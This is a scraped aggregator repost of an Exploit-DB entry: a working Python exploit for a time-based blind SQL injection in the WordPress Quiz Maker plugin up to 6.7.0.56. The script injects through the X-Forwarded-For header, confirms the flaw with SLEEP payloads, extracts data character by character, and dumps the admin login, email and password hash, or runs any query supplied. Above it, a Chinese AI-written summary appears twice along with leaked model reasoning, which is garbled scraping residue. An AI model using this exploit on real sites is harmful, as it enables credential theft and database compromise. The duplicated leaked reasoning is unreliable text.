[webapps] WordPress Quiz Maker 6.7.0.56 - SQL Injection
嗯,用户让我总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述即可。首先,我需要仔细阅读用户提供的文章内容。 看起来这篇文章是一个关于WordPress Quiz Maker插件的SQL注入漏洞的详细说明。文章中提到了漏洞的标题、日期、作者、版本信息以及CVE编号。接着,代码部分展示了如何利用这个漏洞进行攻击,包括发送payload、检测漏洞、提取数据长度和字符,以及最终的用户数据窃取。 所以,我需要把重点放在漏洞的发现、影响范围和利用方法上。同时,要确保在一百个字以内简洁明了地表达出来。 可能的结构是:指出是WordPress Quiz Maker插件的SQL注入漏洞,影响版本<=6.7.0.56,描述了攻击者如何利用该漏洞窃取敏感信息如用户名、密码等,并提到CVE编号。 这样既涵盖了关键点,又符合字数限制。 </think> 该文章揭示了WordPress Quiz Maker插件版本6.7.0.56及以下存在的SQL注入漏洞(CVE-2025-10042),允许攻击者通过特定HTTP头注入恶意SQL代码,窃取敏感数据如管理员用户名、密码哈希和电子邮件地址。 2025-12-25 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
嗯,用户让我总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述即可。首先,我需要仔细阅读用户提供的文章内容。 看起来这篇文章是一个关于WordPress Quiz Maker插件的SQL注入漏洞的详细说明。文章中提到了漏洞的标题、日期、作者、版本信息以及CVE编号。接着,代码部分展示了如何利用这个漏洞进行攻击,包括发送payload、检测漏洞、提取数据长度和字符,以及最终的用户数据窃取。 所以,我需要把重点放在漏洞的发现、影响范围和利用方法上。同时,要确保在一百个字以内简洁明了地表达出来。 可能的结构是:指出是WordPress Quiz Maker插件的SQL注入漏洞,影响版本<=6.7.0.56,描述了攻击者如何利用该漏洞窃取敏感信息如用户名、密码等,并提到CVE编号。 这样既涵盖了关键点,又符合字数限制。 </think> 该文章揭示了WordPress Quiz Maker插件版本6.7.0.56及以下存在的SQL注入漏洞(CVE-2025-10042),允许攻击者通过特定HTTP头注入恶意SQL代码,窃取敏感数据如管理员用户名、密码哈希和电子邮件地址。 2025-12-25 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
# Exploit Title: WordPress Quiz Maker 6.7.0.56 - SQL Injection
# Date: 2025-12-16
# Exploit Author: Rahul Sreenivasan (Tr0j4n)
# Vendor Homepage: https://ays-pro.com/wordpress/quiz-maker
# Software Link: https://wordpress.org/plugins/quiz-maker/
# Version: <= 6.7.0.56
# Tested on: WordPress 6.x with Quiz Maker 6.7.0.56 on Ubuntu/Nginx/PHP-FPM
# CVE: CVE-2025-10042
from argparse import ArgumentParser
from requests import get
from requests.packages.urllib3 import disable_warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from time import time
from sys import exit
disable_warnings(InsecureRequestWarning)
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$/:?"
def send_payload(url, path, header, payload, timeout):
target = f"{url.rstrip('/')}/{path.lstrip('/')}"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
header: payload
}
try:
start = time()
get(target, headers=headers, timeout=timeout, verify=False)
return time() - start
except:
return timeout
def check_vulnerable(url, path, header, sleep_time, timeout):
print("[*] Testing for SQL injection vulnerability...")
baseline = send_payload(url, path, header, "127.0.0.1", timeout)
print(f"[*] Baseline response time: {baseline:.2f}s")
payload = f"1' OR SLEEP({sleep_time})#"
injection = send_payload(url, path, header, payload, timeout)
print(f"[*] Injection response time: {injection:.2f}s")
if injection >= sleep_time * 0.7:
print("[+] Target is VULNERABLE!")
return True
else:
print("[-] Target does not appear to be vulnerable.")
return False
def extract_length(url, path, header, query, timeout):
low, high = 1, 100
while low < high:
mid = (low + high) // 2
payload = f"1' OR IF(LENGTH(({query}))>{mid},SLEEP(1),0)#"
elapsed = send_payload(url, path, header, payload, timeout)
if elapsed >= 0.8:
low = mid + 1
else:
high = mid
return low
def extract_char(url, path, header, query, position, timeout):
low, high = 32, 126
while low < high:
mid = (low + high) // 2
payload = f"1' OR IF(ASCII(SUBSTRING(({query}),{position},1))>{mid},SLEEP(1),0)#"
elapsed = send_payload(url, path, header, payload, timeout)
if elapsed >= 0.8:
low = mid + 1
else:
high = mid
return chr(low) if low <= 126 else "?"
def extract_data(url, path, header, query, timeout):
length = extract_length(url, path, header, query, timeout)
print(f"[*] Data length: {length}")
result = ""
for i in range(1, length + 1):
char = extract_char(url, path, header, query, i, timeout)
result += char
print(f"\r[*] Extracting: {result}", end="", flush=True)
print()
return result
def dump_users(url, path, header, timeout):
print("\n[*] Extracting WordPress admin users...")
# Get admin user login
query = "SELECT user_login FROM wp_users WHERE ID=1"
username = extract_data(url, path, header, query, timeout)
print(f"[+] Username: {username}")
# Get admin email
query = "SELECT user_email FROM wp_users WHERE ID=1"
email = extract_data(url, path, header, query, timeout)
print(f"[+] Email: {email}")
# Get password hash
query = "SELECT user_pass FROM wp_users WHERE ID=1"
password = extract_data(url, path, header, query, timeout)
print(f"[+] Password Hash: {password}")
return username, email, password
def main():
parser = ArgumentParser(description="WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL")
parser.add_argument("-p", "--path", required=True, help="Path to quiz page")
parser.add_argument("-H", "--header", default="X-Forwarded-For", help="Header for injection")
parser.add_argument("-t", "--timeout", type=int, default=10, help="Request timeout")
parser.add_argument("--check", action="store_true", help="Only check vulnerability")
parser.add_argument("--dump", action="store_true", help="Dump admin credentials")
parser.add_argument("--query", help="Custom SQL query to extract")
args = parser.parse_args()
print("[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
print(f"[+] Target: {args.url}")
if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):
exit(1)
if args.check:
exit(0)
if args.dump:
dump_users(args.url, args.path, args.header, args.timeout)
elif args.query:
print(f"\n[*] Executing custom query: {args.query}")
result = extract_data(args.url, args.path, args.header, args.query, args.timeout)
print(f"[+] Result: {result}")
else:
dump_users(args.url, args.path, args.header, args.timeout)
if __name__ == "__main__":
main()
文章来源: https://www.exploit-db.com/exploits/52465
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh